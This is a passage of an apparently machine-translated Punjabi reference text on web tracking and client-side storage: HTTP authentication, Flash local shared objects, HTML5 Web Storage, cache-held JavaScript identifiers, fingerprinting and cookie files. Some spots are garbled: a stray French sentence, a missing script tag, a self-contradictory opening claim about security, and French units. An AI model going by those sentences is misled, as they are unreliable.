ਕੁਝ ਮਾਮਲਿਆਂ ਵਿੱਚ ਇਹ ਸਰਵਰ ਦੇ ਗੈਰ-ਸ਼ਾਮਲ ਹੋਣ ਦੇ ਕਾਰਨ, ਕੂਕੀਜ਼ ਨਾਲੋਂ ਵਧੇਰੇ ਸੁਰੱਖਿਅਤ ਹੋ ਸਕਦਾ ਹੈ, ਇਸ ਤਰ੍ਹਾਂ ਇਸਨੂੰ ਸਨਿਫਰ ਕੂਕੀਜ਼ ਦੇ ਨੈਟਵਰਕ ਹਮਲੇ ਲਈ ਅਸੁਰੱਖਿਅਤ ਬਣਾਉਂਦਾ ਹੈ। ਹਾਲਾਂਕਿ, ਜੇਕਰ ਡੇਟਾ ਦੀ ਸੁਰੱਖਿਆ ਲਈ ਵਿਸ਼ੇਸ਼ ਉਪਾਅ ਕੀਤੇ ਜਾਂਦੇ ਹਨ, ਤਾਂ ਇਹ ਹੋਰ ਹਮਲਿਆਂ ਲਈ ਕਮਜ਼ੋਰ ਹੁੰਦਾ ਹੈ, ਕਿਉਂਕਿ ਡੇਟਾ ਉਸੇ ਵਿੰਡੋ ਵਿੱਚ ਖੋਲ੍ਹੀਆਂ ਗਈਆਂ ਹੋਰ ਸਾਈਟਾਂ ਰਾਹੀਂ ਉਪਲਬਧ ਹੁੰਦਾ ਹੈ।
HTTP ਪ੍ਰਮਾਣਿਕਤਾ
HTTP ਪ੍ਰੋਟੋਕੋਲ ਵਿੱਚ ਬੁਨਿਆਦੀ ਪਹੁੰਚ ਪ੍ਰਮਾਣਿਕਤਾ ਪ੍ਰੋਟੋਕੋਲ ਅਤੇ ਐਕਸੈਸ ਪ੍ਰਮਾਣੀਕਰਨ ਡਾਇਜੈਸਟ ਸ਼ਾਮਲ ਹੁੰਦੇ ਹਨ, ਜੋ ਇੱਕ ਵੈਬ ਪੇਜ ਤੱਕ ਪਹੁੰਚ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਜਦੋਂ ਉਪਭੋਗਤਾ ਨੇ ਉਪਭੋਗਤਾ ਨਾਮ ਅਤੇ ਪਾਸਵਰਡ ਦਿੱਤਾ ਹੁੰਦਾ ਹੈ। ਜੇਕਰ ਸਰਵਰ ਕਿਸੇ ਵੈਬ ਪੇਜ ਤੱਕ ਪਹੁੰਚ ਪ੍ਰਦਾਨ ਕਰਨ ਲਈ ਇੱਕ ਸਰਟੀਫਿਕੇਟ ਦੀ ਬੇਨਤੀ ਕਰਦਾ ਹੈ, ਤਾਂ ਬ੍ਰਾਊਜ਼ਰ ਉਪਭੋਗਤਾ ਤੋਂ ਇਸਦੀ ਬੇਨਤੀ ਕਰਦਾ ਹੈ ਅਤੇ ਇੱਕ ਵਾਰ ਪ੍ਰਾਪਤ ਕਰਨ ਤੋਂ ਬਾਅਦ, ਬ੍ਰਾਊਜ਼ਰ ਇਸਨੂੰ ਸਟੋਰ ਕਰਦਾ ਹੈ ਅਤੇ ਅਗਲੀਆਂ ਸਾਰੀਆਂ HTTP ਬੇਨਤੀਆਂ ਵਿੱਚ ਭੇਜਦਾ ਹੈ। ਇਹ ਜਾਣਕਾਰੀ ਉਪਭੋਗਤਾ ਨੂੰ ਟਰੈਕ ਕਰਨ ਲਈ ਵਰਤੀ ਜਾ ਸਕਦੀ ਹੈ।
ਸਥਾਨਕ ਸਾਂਝੀ ਕੀਤੀ ਵਸਤੂ
ਜੇਕਰ ਕਿਸੇ ਬ੍ਰਾਊਜ਼ਰ ਵਿੱਚ Adobe Flash Player ਪਲੱਗਇਨ ਸ਼ਾਮਲ ਹੈ, ਤਾਂ ਸਥਾਨਕ ਸ਼ੇਅਰ ਆਬਜੈਕਟ ਕੂਕੀਜ਼ ਦੇ ਸਮਾਨ ਉਦੇਸ਼ ਲਈ ਵਰਤਿਆ ਜਾ ਸਕਦਾ ਹੈ। ਉਹ ਵੈੱਬ ਡਿਵੈਲਪਰਾਂ ਲਈ ਇੱਕ ਆਕਰਸ਼ਕ ਵਿਕਲਪ ਹੋ ਸਕਦੇ ਹਨ ਕਿਉਂਕਿ:
- ਇੱਕ ਸਥਾਨਕ ਸ਼ੇਅਰਡ ਆਬਜੈਕਟ ਲਈ ਡਿਫੌਲਟ ਆਕਾਰ ਸੀਮਾ 100 KB ਹੈ;
- ਸੁਰੱਖਿਆ ਜਾਂਚਾਂ ਉਪਭੋਗਤਾ ਕੂਕੀਜ਼ ਜਾਂਚਾਂ ਤੋਂ ਵੱਖਰੀਆਂ ਹੁੰਦੀਆਂ ਹਨ (ਇਸ ਲਈ ਸਥਾਨਕ ਸਾਂਝੀਆਂ ਵਸਤੂਆਂ ਦੀ ਇਜਾਜ਼ਤ ਦਿੱਤੀ ਜਾ ਸਕਦੀ ਹੈ ਜਦੋਂ ਕੂਕੀਜ਼ ਨਾ ਹੋਣ)।
ਇਹ ਆਖਰੀ ਬਿੰਦੂ, ਜੋ ਕੂਕੀ ਪ੍ਰਬੰਧਨ ਨੀਤੀ ਨੂੰ Adobe ਦੇ ਸਥਾਨਕ ਸ਼ੇਅਰਡ ਆਬਜੈਕਟਸ ਤੋਂ ਵੱਖਰਾ ਕਰਦਾ ਹੈ ਸਵਾਲ ਖੜ੍ਹੇ ਕਰਦਾ ਹੈ ਉਸਦੀ ਗੋਪਨੀਯਤਾ ਸੈਟਿੰਗਾਂ ਦੇ ਉਪਭੋਗਤਾ ਦੁਆਰਾ ਪ੍ਰਬੰਧਨ ਦੇ ਸੰਬੰਧ ਵਿੱਚ: ਉਸਨੂੰ ਇਹ ਪਤਾ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ ਕਿ ਉਸਦੇ ਕੂਕੀਜ਼ ਦੇ ਪ੍ਰਬੰਧਨ ਦਾ ਸਥਾਨਕ ਸਾਂਝੀਆਂ ਵਸਤੂਆਂ ਦੇ ਪ੍ਰਬੰਧਨ 'ਤੇ ਕੋਈ ਪ੍ਰਭਾਵ ਨਹੀਂ ਹੈ, ਅਤੇ ਇਸਦੇ ਉਲਟ।
ਇਸ ਪ੍ਰਣਾਲੀ ਦੀ ਇਕ ਹੋਰ ਆਲੋਚਨਾ ਇਹ ਹੈ ਕਿ ਇਹ ਕੇਵਲ ਅਡੋਬ ਫਲੈਸ਼ ਪਲੇਅਰ ਪਲੱਗਇਨ ਦੁਆਰਾ ਵਰਤੀ ਜਾ ਸਕਦੀ ਹੈ ਜੋ ਮਲਕੀਅਤ ਹੈ ਨਾ ਕਿ ਵੈਬ ਸਟੈਂਡਰਡ।
ਕਲਾਇੰਟ-ਸਾਈਡ ਸਥਿਰਤਾ
ਕੁਝ ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਇੱਕ ਸਕ੍ਰਿਪਟ-ਅਧਾਰਿਤ ਸਥਿਰਤਾ ਵਿਧੀ ਦਾ ਸਮਰਥਨ ਕਰਦੇ ਹਨ, ਜੋ ਪੰਨੇ ਨੂੰ ਬਾਅਦ ਵਿੱਚ ਵਰਤੋਂ ਲਈ ਸਥਾਨਕ ਤੌਰ 'ਤੇ ਜਾਣਕਾਰੀ ਸਟੋਰ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ। ਇੰਟਰਨੈੱਟ ਐਕਸਪਲੋਰਰ, ਉਦਾਹਰਨ ਲਈ, ਬ੍ਰਾਊਜ਼ਰ ਇਤਿਹਾਸ, ਬੁੱਕਮਾਰਕਸ, XML ਵਿੱਚ ਸਟੋਰ ਕੀਤੇ ਇੱਕ ਫਾਰਮੈਟ ਵਿੱਚ, ਜਾਂ ਸਿੱਧੇ ਤੌਰ 'ਤੇ ਡਿਸਕ 'ਤੇ ਸੁਰੱਖਿਅਤ ਕੀਤੇ ਵੈਬ ਪੇਜ ਨਾਲ ਨਿਰੰਤਰ ਜਾਣਕਾਰੀ ਦਾ ਸਮਰਥਨ ਕਰਦਾ ਹੈ। ਮਾਈਕਰੋਸਾਫਟ ਇੰਟਰਨੈਟ ਐਕਸਪਲੋਰਰ 5 ਲਈ, DHTML ਵਿਵਹਾਰ ਦੁਆਰਾ ਇੱਕ ਉਪਭੋਗਤਾ-ਡਾਟਾ ਵਿਧੀ ਉਪਲਬਧ ਹੈ।
W3C ਨੇ HTML 5 ਵਿੱਚ ਕਲਾਇੰਟ-ਸਾਈਡ ਡੇਟਾ ਸਟੋਰੇਜ ਲਈ ਇੱਕ ਨਵਾਂ JavaScript API ਪੇਸ਼ ਕੀਤਾ ਜਿਸਨੂੰ ਵੈੱਬ ਸਟੋਰੇਜ ਕਿਹਾ ਜਾਂਦਾ ਹੈ ਅਤੇ ਇਸਦਾ ਉਦੇਸ਼ ਕੂਕੀਜ਼ ਨੂੰ ਸਥਾਈ ਤੌਰ 'ਤੇ ਬਦਲਣਾ ਹੈ। ਇਹ ਕੂਕੀਜ਼ ਦੇ ਸਮਾਨ ਹੈ ਪਰ ਬਹੁਤ ਸੁਧਾਰੀ ਸਮਰੱਥਾ ਦੇ ਨਾਲ ਅਤੇ HTTP ਬੇਨਤੀਆਂ ਦੇ ਸਿਰਲੇਖ ਵਿੱਚ ਜਾਣਕਾਰੀ ਨੂੰ ਸਟੋਰ ਕੀਤੇ ਬਿਨਾਂ। API ਦੋ ਕਿਸਮਾਂ ਦੇ ਵੈੱਬ ਸਟੋਰੇਜ ਦੀ ਆਗਿਆ ਦਿੰਦਾ ਹੈ: ਲੋਕਲ ਸਟੋਰੇਜ ਅਤੇ ਸੈਸ਼ਨ ਸਟੋਰੇਜ, ਸਥਾਈ ਕੂਕੀਜ਼ ਅਤੇ ਸੈਸ਼ਨ ਕੂਕੀਜ਼ ਦੇ ਸਮਾਨ (ਉਸ ਸੈਸ਼ਨ ਕੂਕੀਜ਼ ਨੂੰ ਛੱਡ ਕੇ ਜਦੋਂ ਬ੍ਰਾਊਜ਼ਰ ਬੰਦ ਹੁੰਦਾ ਹੈ ਸੈਸ਼ਨ ਸਟੋਰੇਜ ਟੈਬ ਬੰਦ ਹੋਣ 'ਤੇ ਮਿਆਦ ਖਤਮ ਹੋ ਜਾਂਦੀ ਹੈ), ਕ੍ਰਮਵਾਰ। ਵੈੱਬ ਸਟੋਰੇਜ ਮੋਜ਼ੀਲਾ ਫਾਇਰਫਾਕਸ 3.5, ਗੂਗਲ ਕਰੋਮ 5, ਐਪਲ ਸਫਾਰੀ 4, ਮਾਈਕ੍ਰੋਸਾਫਟ ਇੰਟਰਨੈਟ ਐਕਸਪਲੋਰਰ 8 ਅਤੇ ਓਪੇਰਾ 10.50 ਦੁਆਰਾ ਸਮਰਥਿਤ ਹੈ।
ਇੱਕ ਵੱਖਰੀ ਵਿਧੀ ਆਮ ਤੌਰ 'ਤੇ ਵੈੱਬ ਪੰਨਿਆਂ ਵਿੱਚ JavaScript ਪ੍ਰੋਗਰਾਮਾਂ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਬ੍ਰਾਊਜ਼ਰ ਕੈਚਿੰਗ (ਰੀਫ੍ਰੈਸ਼ ਕਰਨ ਦੀ ਬਜਾਏ ਮੈਮੋਰੀ ਵਿੱਚ) 'ਤੇ ਨਿਰਭਰ ਕਰਦੀ ਹੈ।
ਉਦਾਹਰਨ ਲਈ, ਇੱਕ ਪੰਨੇ ਵਿੱਚ ਟੈਗ ਹੋ ਸਕਦਾ ਹੈ . La première fois que la page se charge, le programme exemple.js est aussi chargé.
ਇਸ ਸਮੇਂ, ਪ੍ਰੋਗਰਾਮ ਕੈਸ਼ ਮੈਮੋਰੀ ਵਿੱਚ ਰਹਿੰਦਾ ਹੈ ਅਤੇ ਵਿਜ਼ਿਟ ਕੀਤੇ ਪੰਨੇ ਨੂੰ ਦੂਜੀ ਵਾਰ ਰੀਲੋਡ ਨਹੀਂ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਸਿੱਟੇ ਵਜੋਂ, ਜੇਕਰ ਪ੍ਰੋਗਰਾਮ ਵਿੱਚ ਇੱਕ ਗਲੋਬਲ ਵੇਰੀਏਬਲ ਹੈ (ਉਦਾਹਰਨ ਲਈ var id = 3243242;), ਤਾਂ ਇਹ ਪਛਾਣਕਰਤਾ ਵੈਧ ਰਹਿੰਦਾ ਹੈ ਅਤੇ ਇੱਕ ਵਾਰ ਪੰਨਾ ਦੁਬਾਰਾ ਲੋਡ ਹੋਣ 'ਤੇ, ਜਾਂ ਇੱਕ ਵਾਰ ਪ੍ਰੋਗਰਾਮ ਨੂੰ ਲਿੰਕ ਕਰਨ ਵਾਲੇ ਪੰਨੇ ਦੇ ਲੋਡ ਹੋਣ 'ਤੇ ਦੂਜੇ JavaScript ਕੋਡ ਦੁਆਰਾ ਇਸਦਾ ਸ਼ੋਸ਼ਣ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ।
ਇਸ ਵਿਧੀ ਦਾ ਵੱਡਾ ਨੁਕਸਾਨ ਇਹ ਹੈ ਕਿ JavaScript ਗਲੋਬਲ ਵੇਰੀਏਬਲ ਸਥਿਰ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ, ਭਾਵ ਇਸਨੂੰ ਕੂਕੀ ਵਾਂਗ ਬਦਲਿਆ ਜਾਂ ਮਿਟਾਇਆ ਨਹੀਂ ਜਾ ਸਕਦਾ।
ਵੈੱਬ ਬਰਾਊਜ਼ਰ ਫਿੰਗਰਪ੍ਰਿੰਟ
ਬ੍ਰਾਊਜ਼ਰ ਫਿੰਗਰਪ੍ਰਿੰਟ ਪਛਾਣ ਦੇ ਉਦੇਸ਼ਾਂ ਲਈ ਬ੍ਰਾਊਜ਼ਰ ਦੀਆਂ ਸੰਰਚਨਾ ਸੈਟਿੰਗਾਂ ਬਾਰੇ ਇਕੱਤਰ ਕੀਤੀ ਜਾਣਕਾਰੀ ਹੈ। ਇਹਨਾਂ ਫਿੰਗਰਪ੍ਰਿੰਟਸ ਦੀ ਵਰਤੋਂ ਕੂਕੀਜ਼ ਦੇ ਅਯੋਗ ਹੋਣ 'ਤੇ ਵੀ ਕਿਸੇ ਇੰਟਰਨੈਟ ਉਪਭੋਗਤਾ ਜਾਂ ਡਿਵਾਈਸ ਦੀ ਪੂਰੀ ਜਾਂ ਅੰਸ਼ਕ ਤੌਰ 'ਤੇ ਪਛਾਣ ਕਰਨ ਲਈ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ।
ਬੁਨਿਆਦੀ ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਕੌਂਫਿਗਰੇਸ਼ਨ ਜਾਣਕਾਰੀ ਲੰਬੇ ਸਮੇਂ ਤੋਂ ਵੈੱਬਸਾਈਟ ਦਰਸ਼ਕ ਸੇਵਾਵਾਂ ਦੁਆਰਾ ਮਨੁੱਖੀ ਵੈਬ ਟ੍ਰੈਫਿਕ ਨੂੰ ਸਹੀ ਢੰਗ ਨਾਲ ਮਾਪਣ ਅਤੇ ਕਲਿੱਕ ਧੋਖਾਧੜੀ ਦੇ ਵੱਖ-ਵੱਖ ਰੂਪਾਂ ਦਾ ਪਤਾ ਲਗਾਉਣ ਦੇ ਉਦੇਸ਼ ਲਈ ਇਕੱਠੀ ਕੀਤੀ ਗਈ ਹੈ। ਕਲਾਇੰਟ-ਸਾਈਡ ਸਕ੍ਰਿਪਟਿੰਗ ਭਾਸ਼ਾਵਾਂ ਦੀ ਮਦਦ ਨਾਲ, ਬਹੁਤ ਜ਼ਿਆਦਾ ਸਹੀ ਜਾਣਕਾਰੀ ਇਕੱਠੀ ਕਰਨੀ ਹੈ ਹੁਣ ਸੰਭਵ ਹੈ.
ਇਸ ਜਾਣਕਾਰੀ ਨੂੰ ਇੱਕ ਬਿੱਟ ਸਤਰ ਵਿੱਚ ਬਦਲਣ ਨਾਲ ਇੱਕ ਡਿਵਾਈਸ ਫਿੰਗਰਪ੍ਰਿੰਟ ਪੈਦਾ ਹੁੰਦਾ ਹੈ। 2010 ਵਿੱਚ, ਇਲੈਕਟ੍ਰਾਨਿਕ ਫਰੰਟੀਅਰ ਫਾਊਂਡੇਸ਼ਨ (EFF) ਨੇ ਇੱਕ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਫਿੰਗਰਪ੍ਰਿੰਟ ਦੀ ਐਂਟਰੌਪੀ ਨੂੰ ਘੱਟੋ-ਘੱਟ ਮਾਪਿਆ। 18,1 ਬਿੱਟ, ਅਤੇ ਇਹ ਕੈਨਵਸ ਫਿੰਗਰਪ੍ਰਿੰਟਿੰਗ ਵਿੱਚ ਤਰੱਕੀ ਤੋਂ ਪਹਿਲਾਂ ਦੀ ਗੱਲ ਸੀ, ਜਿਸ ਨੇ ਉਸ ਐਂਟਰੌਪੀ ਵਿੱਚ 5,7 ਬਿੱਟ ਸ਼ਾਮਲ ਕੀਤੇ ਸਨ।
ਸੰਖੇਪ ਵਿੱਚ ਕੂਕੀਜ਼
ਕੂਕੀਜ਼ ਇੱਕ ਵੈਬਸਾਈਟ ਵਿਜ਼ਟਰ ਦੀ ਹਾਰਡ ਡਰਾਈਵ ਉੱਤੇ ਵੈੱਬ ਬ੍ਰਾਊਜ਼ਰ ਦੁਆਰਾ ਸਟੋਰ ਕੀਤੀਆਂ ਛੋਟੀਆਂ ਟੈਕਸਟ ਫਾਈਲਾਂ ਹੁੰਦੀਆਂ ਹਨ ਅਤੇ ਜਿਹਨਾਂ ਦੀ ਵਰਤੋਂ ਵਿਜ਼ਟਰ ਜਾਂ ਸਾਈਟ ਦੁਆਰਾ ਉਹਨਾਂ ਦੀ ਯਾਤਰਾ ਬਾਰੇ ਜਾਣਕਾਰੀ ਨੂੰ ਰਿਕਾਰਡ ਕਰਨ ਲਈ (ਹੋਰ ਚੀਜ਼ਾਂ ਦੇ ਨਾਲ) ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਵੈਬਮਾਸਟਰ ਇਸ ਤਰ੍ਹਾਂ ਇੱਕ ਵਿਜ਼ਟਰ ਦੀਆਂ ਆਦਤਾਂ ਨੂੰ ਪਛਾਣ ਸਕਦਾ ਹੈ ਅਤੇ ਹਰੇਕ ਵਿਜ਼ਟਰ ਲਈ ਆਪਣੀ ਸਾਈਟ ਦੀ ਪੇਸ਼ਕਾਰੀ ਨੂੰ ਵਿਅਕਤੀਗਤ ਬਣਾ ਸਕਦਾ ਹੈ; ਕੂਕੀਜ਼ ਫਿਰ ਇਹ ਯਾਦ ਰੱਖਣਾ ਸੰਭਵ ਬਣਾਉਂਦੀਆਂ ਹਨ ਕਿ ਹੋਮ ਪੇਜ 'ਤੇ ਕਿੰਨੇ ਲੇਖ ਪ੍ਰਦਰਸ਼ਿਤ ਕਰਨੇ ਹਨ ਜਾਂ ਕਿਸੇ ਵੀ ਪ੍ਰਾਈਵੇਟ ਪਾਰਟੀ ਲਈ ਲੌਗਇਨ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਨੂੰ ਬਰਕਰਾਰ ਰੱਖਣਾ ਹੈ: ਜਦੋਂ ਵਿਜ਼ਟਰ ਸਾਈਟ 'ਤੇ ਵਾਪਸ ਆਉਂਦਾ ਹੈ, ਤਾਂ ਉਸ ਲਈ ਆਪਣਾ ਨਾਮ ਅਤੇ ਪਾਸਵਰਡ ਟਾਈਪ ਕਰਨਾ ਜ਼ਰੂਰੀ ਨਹੀਂ ਹੁੰਦਾ। ਪਛਾਣੇ ਜਾਣ, ਕਿਉਂਕਿ ਉਹ ਕੂਕੀ ਵਿੱਚ ਆਪਣੇ ਆਪ ਪੜ੍ਹੇ ਜਾਂਦੇ ਹਨ।
ਇੱਕ ਕੂਕੀ ਦੀ ਇੱਕ ਸੀਮਤ ਉਮਰ ਹੁੰਦੀ ਹੈ, ਜੋ ਸਾਈਟ ਡਿਜ਼ਾਈਨਰ ਦੁਆਰਾ ਨਿਰਧਾਰਤ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਉਹ ਸਾਈਟ 'ਤੇ ਸੈਸ਼ਨ ਦੇ ਅੰਤ 'ਤੇ ਵੀ ਖਤਮ ਹੋ ਸਕਦੇ ਹਨ, ਜੋ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਬੰਦ ਹੋਣ ਨਾਲ ਮੇਲ ਖਾਂਦਾ ਹੈ। ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਸੈਲਾਨੀਆਂ ਲਈ ਜੀਵਨ ਨੂੰ ਆਸਾਨ ਬਣਾਉਣ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਵਧੇਰੇ ਢੁਕਵੀਂ ਜਾਣਕਾਰੀ ਨਾਲ ਪੇਸ਼ ਕਰਨ ਲਈ ਵਿਆਪਕ ਤੌਰ 'ਤੇ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਪਰ ਵਿਸ਼ੇਸ਼ ਤਕਨੀਕਾਂ ਕਈ ਸਾਈਟਾਂ 'ਤੇ ਵਿਜ਼ਟਰ ਦੀ ਪਾਲਣਾ ਕਰਨਾ ਸੰਭਵ ਬਣਾਉਂਦੀਆਂ ਹਨ ਅਤੇ ਇਸ ਤਰ੍ਹਾਂ ਉਸ ਦੀਆਂ ਆਦਤਾਂ ਬਾਰੇ ਬਹੁਤ ਵਿਆਪਕ ਜਾਣਕਾਰੀ ਇਕੱਠੀ ਕਰਨ ਅਤੇ ਜਾਂਚ ਕਰਨ ਲਈ। ਇਸ ਵਿਧੀ ਨੇ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਨੂੰ ਇੱਕ ਨਿਗਰਾਨੀ ਤਕਨੀਕ ਵਜੋਂ ਇੱਕ ਪ੍ਰਤਿਸ਼ਠਾ ਦਿੱਤੀ ਹੈ ਜੋ ਸੈਲਾਨੀਆਂ ਦੀ ਗੋਪਨੀਯਤਾ ਦੀ ਉਲੰਘਣਾ ਕਰਦੀ ਹੈ, ਜੋ ਕਿ ਬਦਕਿਸਮਤੀ ਨਾਲ ਗੈਰ-ਤਕਨੀਕੀ ਕਾਰਨਾਂ ਜਾਂ ਉਪਭੋਗਤਾ ਦੀਆਂ ਉਮੀਦਾਂ ਦਾ ਆਦਰ ਨਾ ਕਰਨ ਲਈ ਵਰਤੋਂ ਦੇ ਬਹੁਤ ਸਾਰੇ ਮਾਮਲਿਆਂ ਵਿੱਚ ਅਸਲੀਅਤ ਨਾਲ ਮੇਲ ਖਾਂਦਾ ਹੈ।
ਇਹਨਾਂ ਜਾਇਜ਼ ਡਰਾਂ ਦੇ ਜਵਾਬ ਵਿੱਚ, HTML 5 ਕਲਾਇੰਟ-ਸਾਈਡ ਡੇਟਾ ਸਟੋਰੇਜ ਲਈ ਇੱਕ ਨਵਾਂ JavaScript API ਪੇਸ਼ ਕਰਦਾ ਹੈ ਜਿਸਨੂੰ ਵੈੱਬ ਸਟੋਰੇਜ ਕਿਹਾ ਜਾਂਦਾ ਹੈ, ਜੋ ਕਿ ਬਹੁਤ ਜ਼ਿਆਦਾ ਸੁਰੱਖਿਅਤ ਅਤੇ ਵੱਧ ਸਮਰੱਥਾ ਵਾਲਾ ਹੈ, ਜਿਸਦਾ ਉਦੇਸ਼ ਕੂਕੀਜ਼ ਨੂੰ ਬਦਲਣਾ ਹੈ।
ਕੂਕੀਜ਼ ਦੀ ਸਟੋਰੇਜ਼
ਕੁਝ ਬ੍ਰਾਉਜ਼ਰਾਂ ਦੇ ਨਾਲ, ਇੱਕ ਕੂਕੀ ਆਸਾਨੀ ਨਾਲ ਸੰਪਾਦਨਯੋਗ ਹੈ, ਨੋਟਪੈਡ ਵਰਗਾ ਇੱਕ ਸਧਾਰਨ ਟੈਕਸਟ ਐਡੀਟਰ ਇਸਦੇ ਮੁੱਲਾਂ ਨੂੰ ਹੱਥੀਂ ਬਦਲਣ ਲਈ ਕਾਫੀ ਹੈ।
ਬ੍ਰਾਊਜ਼ਰ 'ਤੇ ਨਿਰਭਰ ਕਰਦੇ ਹੋਏ ਕੂਕੀਜ਼ ਨੂੰ ਵੱਖਰੇ ਢੰਗ ਨਾਲ ਸੁਰੱਖਿਅਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ:
- Microsoft Internet Explorer ਹਰੇਕ ਕੂਕੀ ਨੂੰ ਇੱਕ ਵੱਖਰੀ ਫਾਈਲ ਵਿੱਚ ਸੁਰੱਖਿਅਤ ਕਰਦਾ ਹੈ;
- ਮੋਜ਼ੀਲਾ ਫਾਇਰਫਾਕਸ ਇਸ ਦੀਆਂ ਸਾਰੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਇੱਕ ਫਾਈਲ ਵਿੱਚ ਸੁਰੱਖਿਅਤ ਕਰਦਾ ਹੈ;
- ਓਪੇਰਾ ਇਸਦੀਆਂ ਸਾਰੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਇੱਕ ਫਾਈਲ ਵਿੱਚ ਸੁਰੱਖਿਅਤ ਕਰਦਾ ਹੈ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਐਨਕ੍ਰਿਪਟ ਕਰਦਾ ਹੈ (ਸਾਫਟਵੇਅਰ ਵਿਕਲਪਾਂ ਨੂੰ ਛੱਡ ਕੇ ਉਹਨਾਂ ਨੂੰ ਸੋਧਣਾ ਅਸੰਭਵ);
- ਐਪਲ ਸਫਾਰੀ ਇਸਦੀਆਂ ਸਾਰੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਇੱਕ ਸਿੰਗਲ .plist ਐਕਸਟੈਂਸ਼ਨ ਫਾਈਲ ਵਿੱਚ ਸੁਰੱਖਿਅਤ ਕਰਦਾ ਹੈ। ਸੰਸ਼ੋਧਨ ਸੰਭਵ ਹੈ ਪਰ ਬਹੁਤ ਸੌਖਾ ਨਹੀਂ, ਜਦੋਂ ਤੱਕ ਤੁਸੀਂ ਸੌਫਟਵੇਅਰ ਵਿਕਲਪਾਂ ਵਿੱਚੋਂ ਲੰਘਦੇ ਹੋ।
ਬਰਾਊਜ਼ਰ ਨੂੰ ਸਹਿਯੋਗ ਕਰਨ ਦੀ ਲੋੜ ਹੈ ਘੱਟੋ ਘੱਟ :
- 300 ਸਮਕਾਲੀ ਕੂਕੀਜ਼;
- 4 o ਪ੍ਰਤੀ ਕੂਕੀ;
- 20 ਕੁਕੀਜ਼ ਪ੍ਰਤੀ ਹੋਸਟ ਜਾਂ ਡੋਮੇਨ।
